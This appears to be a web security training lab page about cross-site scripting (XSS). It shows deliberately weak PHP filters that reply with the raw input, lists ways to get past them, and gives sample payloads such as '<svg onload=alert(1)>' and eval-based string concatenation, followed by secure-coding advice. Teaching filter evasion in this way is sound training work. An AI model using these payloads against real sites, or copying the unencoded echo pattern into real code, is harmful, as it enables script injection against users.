Multi-Filter XSS Lab

Test XSS against multiple different filtering techniques

Multi-Filter Challenge

Lab Overview

This lab demonstrates multiple different filtering approaches with various transformation techniques, creating a comprehensive XSS testing environment.

Multiple Filter Types: This application uses four different filtering strategies across different parameters, including HTML encoding and string transformations.
Hidden Parameters: There are multiple hidden parameters not shown in the main form. Use tools like Arjun to discover them!
# use arjun tool to find hidden parameter
Multiple Filtering Methods:
Secure fname, lname - Uses htmlspecialchars()
Quote Injection button - Replaces tags with '\">?'
Secure categoryid - Uses htmlentities()
Break Tag Filter color - Replaces functions with '<br>'
Filter Transformations:
Parameter Input Example After Filter Transformation
button <script>alert(1)</script> <\">?>alert(1)</\">?> 'script' → '">?'
color alert(1);confirm(2) <br>(1);<br>(2) 'alert','confirm' → '<br>'
Filter Complexity: Multiple Filter Types

Objective: Test XSS payloads against all filtering methods and find ways to bypass each specific filter implementation.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["button"])){
    $arr = array('script','img','image');
    $re = str_replace($arr, '">?', $_GET['button']);
    echo $re;
}
elseif(isset($_GET["categoryid"])){
    echo htmlentities($_GET["categoryid"], ENT_QUOTES);
}
elseif(isset($_GET["color"])){
    $arr = array('alert','confirm');
    $color = str_replace($arr, '
', $_GET['color']);
    echo $color;
}
# use arjun tool to find hidden parameter
Test Input Forms
Visible Parameters (HTML Encoded)
This parameter uses htmlspecialchars() encoding
This parameter uses htmlspecialchars() encoding
Hidden Parameters
Hint: The 'button', 'categoryid', and 'color' parameters are not shown in the main form but are implemented in the backend with various filtering methods.
This parameter replaces 'script','img','image' with '\">?'
This parameter uses htmlentities() encoding
This parameter replaces 'alert','confirm' with '<br>'
Multi-Filter Bypass Techniques
Button Parameter Bypasses:
  • Case variation: Use <SCRIPT>, <Script>
  • Alternative tags: Use <svg>, <body>, <iframe>
  • Exploit transformation: The '\">?' replacement might help close attributes
    Example: script becomes \">? which might close an attribute
Color Parameter Bypasses:
  • Alternative functions: Use prompt, console.log, document.write
  • Function obfuscation:
    • window['al'+'ert'](1)
    • eval('al'+'ert(1)')
    • Function('al'+'ert(1)')()
  • Exploit replacement: Use payloads where '<br>' creates valid syntax
General Bypass Techniques:
  • Encoding: Use HTML entities, Unicode, or Base64 encoding
  • Context switching: Use different execution contexts (HTML, JavaScript, CSS)
  • Event handlers: Use onload, onerror, onmouseover without blocked functions
  • JavaScript protocol: Use javascript:alert(1) in href or src attributes
Security Implications

Multiple filtering approaches demonstrate:

  • Different filters require different bypass techniques
  • Transformation filters can create new attack vectors
  • Quote injection filters might help close attributes
  • Break tag replacement can break JavaScript but might be exploitable
  • Multiple security controls increase complexity but not necessarily security
  • Proper output encoding is still the most reliable defense
Best Practices

For secure web applications:

  • Use consistent context-aware output encoding
  • Implement strict Content Security Policy (CSP) headers
  • Validate input using strict whitelists, not blacklists
  • Use modern sanitization libraries (DOMPurify, etc.)
  • Avoid transformation filters that can be exploited
  • Conduct comprehensive security testing with various payloads
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
Payload Examples for Multi-Filter
Button Parameter Payloads:
  • <SCRIPT>alert(1)</SCRIPT> - Uppercase bypass
  • <svg onload=alert(1)> - Alternative tag
  • <body onload=alert(1)> - Body tag with event
  • script - Test transformation behavior
Color Parameter Payloads:
  • prompt(1) - Alternative function
  • console.log(1) - Console output
  • window['al'+'ert'](1) - String concatenation
  • eval('al'+'ert(1)') - Using eval
Advanced Exploitation Payloads:
  • DOM-based: Payloads that leverage DOM manipulation
  • Template injection: Payloads that use template literals
  • Property injection: Payloads that set object properties
  • Protocol handlers: Payloads that use data: or javascript: protocols